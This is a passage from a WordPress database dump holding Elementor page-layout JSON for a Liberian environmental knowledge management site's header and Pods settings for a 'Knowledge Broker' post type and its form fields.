Community\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"right\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"button_text_color\":\"#014421\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"#014421\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(15030,2384,'_elementor_version','2.7.5'),(15031,2384,'_elementor_template_type','wp-post'),(15034,2385,'_wp_page_template','elementor_canvas'),(15035,2385,'_elementor_edit_mode','builder'),(15036,2385,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.48799999999999954525264911353588104248046875,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.7530000000000001136868377216160297393798828125,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.754999999999999005240169935859739780426025390625,\"css_classes\":\"hide-1024\"},\"elements\":[{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Join the Community\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"right\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#014421\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"#014421\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(15037,2385,'_elementor_version','2.7.5'),(15038,2385,'_elementor_template_type','wp-post'),(15041,2386,'_wp_page_template','elementor_canvas'),(15042,2386,'_elementor_edit_mode','builder'),(15043,2386,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.48799999999999954525264911353588104248046875,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.7530000000000001136868377216160297393798828125,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.754999999999999005240169935859739780426025390625,\"css_classes\":\"hide-1024\"},\"elements\":[{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Join Our Community\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"right\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#014421\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"#014421\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(15044,2386,'_elementor_version','2.7.5'),(15045,2386,'_elementor_template_type','wp-post'),(15049,2387,'_wp_page_template','elementor_canvas'),(15050,2387,'_elementor_edit_mode','builder'),(15051,2387,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.48799999999999954525264911353588104248046875,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.7530000000000001136868377216160297393798828125,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.754999999999999005240169935859739780426025390625,\"css_classes\":\"hide-1024\"},\"elements\":[{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Join Our Community\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"right\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#014421\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"#014421\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(15052,2387,'_elementor_version','2.7.5'),(15053,2387,'_elementor_template_type','wp-post'),(15056,2388,'_elementor_controls_usage','a:0:{}'),(15057,2388,'label_singular','Knowledge Broker'),(15058,2388,'public','1'),(15059,2388,'show_ui','1'),(15060,2388,'supports_title','1'),(15061,2388,'supports_editor','1'),(15062,2388,'type','post_type'),(15063,2388,'storage','meta'),(15065,2388,'old_name','knowledge_broker'),(15066,2388,'publicly_queryable','1'),(15067,2388,'exclude_from_search','0'),(15068,2388,'capability_type','page'),(15069,2388,'capability_type_custom','knowledge_broker'),(15070,2388,'capability_type_extra','1'),(15071,2388,'has_archive','1'),(15072,2388,'hierarchical','0'),(15073,2388,'rewrite','1'),(15074,2388,'rewrite_with_front','1'),(15075,2388,'rewrite_feeds','0'),(15076,2388,'rewrite_pages','1'),(15077,2388,'query_var','1'),(15078,2388,'can_export','1'),(15079,2388,'default_status','draft'),(15080,2388,'supports_author','0'),(15081,2388,'supports_thumbnail','1'),(15082,2388,'supports_excerpt','0'),(15083,2388,'supports_trackbacks','0'),(15084,2388,'supports_custom_fields','0'),(15085,2388,'supports_comments','0'),(15086,2388,'supports_revisions','0'),(15087,2388,'supports_page_attributes','0'),(15088,2388,'supports_post_formats','0'),(15089,2388,'built_in_taxonomies_category','0'),(15090,2388,'built_in_taxonomies_elementor_library_category','0'),(15091,2388,'built_in_taxonomies_elementor_library_type','0'),(15092,2388,'built_in_taxonomies_link_category','0'),(15093,2388,'built_in_taxonomies_post_tag','0'),(15094,2388,'built_in_taxonomies_resource_category','0'),(15095,2388,'built_in_taxonomies_resource_tag','0'),(15096,2388,'built_in_taxonomies_resource_type','0'),(15097,2388,'show_in_menu','1'),(15098,2388,'menu_position','0'),(15099,2388,'show_in_nav_menus','1'),(15100,2388,'show_in_admin_bar','1'),(15101,2388,'pfat_enable','1'),(15102,2388,'pfat_run_outside_loop','1'),(15103,2388,'pfat_single','Knowledge Brokers Template'),(15104,2388,'pfat_append_single','replace'),(15105,2388,'pfat_filter_single','the_content'),(15106,2388,'pfat_append_archive','replace'),(15107,2388,'pfat_filter_archive','the_content'),(15108,2388,'rest_enable','0'),(15109,2388,'read_all','0'),(15110,2388,'write_all','0'),(15111,412,'built_in_post_types_knowledge_broker','0'),(15112,413,'built_in_post_types_knowledge_broker','0'),(15113,465,'built_in_post_types_knowledge_broker','0'),(15267,2390,'_elementor_controls_usage','a:0:{}'),(15268,2390,'type','text'),(15269,2390,'required','0'),(15270,2390,'text_allow_shortcode','0'),(15271,2390,'text_allow_html','0'),(15272,2390,'text_allowed_html_tags','strong em a ul ol li b i'),(15273,2390,'text_max_length','255'),(15274,2390,'website_format','normal'),(15275,2390,'website_allow_port','0'),(15276,2390,'website_clickable','0'),(15277,2390,'website_new_window','0'),(15278,2390,'website_max_length','255'),(15279,2390,'website_html5','0'),(15280,2390,'phone_format','999-999-9999 x999'),(15281,2390,'phone_enable_phone_extension','1'),(15282,2390,'phone_max_length','25'),(15283,2390,'phone_html5','0'),(15284,2390,'email_max_length','255'),(15285,2390,'email_html5','0'),(15286,2390,'password_max_length','255'),(15287,2390,'paragraph_allow_html','1'),(15288,2390,'paragraph_oembed','0'),(15289,2390,'paragraph_wptexturize','1'),(15290,2390,'paragraph_convert_chars','1'),(15291,2390,'paragraph_wpautop','1'),(15292,2390,'paragraph_allow_shortcode','0'),(15293,2390,'paragraph_allowed_html_tags','strong em a ul ol li b i'),(15294,2390,'paragraph_max_length','0'),(15295,2390,'wysiwyg_editor','tinymce'),(15296,2390,'wysiwyg_media_buttons','1'),(15297,2390,'wysiwyg_oembed','0'),(15298,2390,'wysiwyg_wptexturize','1'),(15299,2390,'wysiwyg_convert_chars','1'),(15300,2390,'wysiwyg_wpautop','1'),(15301,2390,'wysiwyg_allow_shortcode','0'),(15302,2390,'code_allow_shortcode','0'),(15303,2390,'code_max_length','0'),(15304,2390,'datetime_type','format'),(15305,2390,'datetime_format','mdy'),(15306,2390,'datetime_time_type','12'),(15307,2390,'datetime_time_format','h_mma'),(15308,2390,'datetime_time_format_24','hh_mm'),(15309,2390,'datetime_allow_empty','1'),(15310,2390,'datetime_html5','0'),(15311,2390,'date_type','format'),(15312,2390,'date_format','mdy'),(15313,2390,'date_allow_empty','1'),(15314,2390,'date_html5','0'),(15315,2390,'time_type','12'),(15316,2390,'time_format','h_mma'),(15317,2390,'time_format_24','hh_mm'),(15318,2390,'time_allow_empty','1'),(15319,2390,'time_html5','0'),(15320,2390,'number_format_type','number'),(15321,2390,'number_format','i18n'),(15322,2390,'number_decimals','0'),(15323,2390,'number_format_soft','0'),(15324,2390,'number_step','1'),(15325,2390,'number_min','0'),(15326,2390,'number_max','100'),(15327,2390,'number_max_length','12'),(15328,2390,'currency_format_type','number'),(15329,2390,'currency_format_sign','usd'),(15330,2390,'currency_format_placement','before'),(15331,2390,'currency_format','i18n'),(15332,2390,'currency_decimals','2'),(15333,2390,'currency_decimal_handling','none'),(15334,2390,'currency_step','1'),(15335,2390,'currency_min','0'),(15336,2390,'currency_max','1000'),(15337,2390,'currency_max_length','12'),(15338,2390,'file_format_type','single'),(15339,2390,'file_uploader','attachment'),(15340,2390,'file_attachment_tab','upload'),(15341,2390,'file_edit_title','1'),(15342,2390,'file_show_edit_link','0'),(15343,2390,'file_linked','0'),(15344,2390,'file_limit','0'),(15345,2390,'file_restrict_filesize','10MB'),(15346,2390,'file_type','images'),(15347,2390,'file_field_template','rows'),(15348,2390,'file_add_button','Add File'),(15349,2390,'file_modal_title','Attach a file'),(15350,2390,'file_modal_add_button','Add 